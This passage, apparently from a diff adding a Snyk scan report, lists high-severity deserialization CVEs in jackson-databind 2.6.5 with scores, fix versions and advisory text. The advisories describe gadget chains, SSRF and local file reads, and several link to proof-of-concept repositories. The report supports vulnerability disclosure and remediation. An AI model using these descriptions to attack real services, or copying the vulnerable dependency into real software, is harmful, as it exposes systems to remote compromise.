from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36189" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:37:54.679882Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:37:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.089230Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.824076Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36188", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.488317Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36188" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:39:28.531700Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:32Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:03.468032Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Poc" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.757298Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36181" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:41:09.172252Z", + "functions_new": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.686589Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Yangkun (ICSL)" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2854", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", + "title": "GitHub Release" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:04.169362Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", + "epssDetails": { + "percentile": "0.74700", + "probability": "0.00431", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-20190" + ], + "CWE": [ + "CWE-502", + "CWE-918" + ], + "GHSA": [ + "GHSA-5949-rw7g-wx7w" + ], + "RHSA": [ + "RHSA-1610966837463990" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-18T12:50:16.466618Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-18T17:23:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:17.193594Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.7" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9)", + "[2.8.0,2.8.11.4)", + "[2.7.0,2.7.9.6)", + "[,2.6.7.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9", + "2.8.11.4", + "2.7.9.6", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2326", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", + "title": "Github Release Tag" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12086", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:55.897269Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", + "epssDetails": { + "percentile": "0.74218", + "probability": 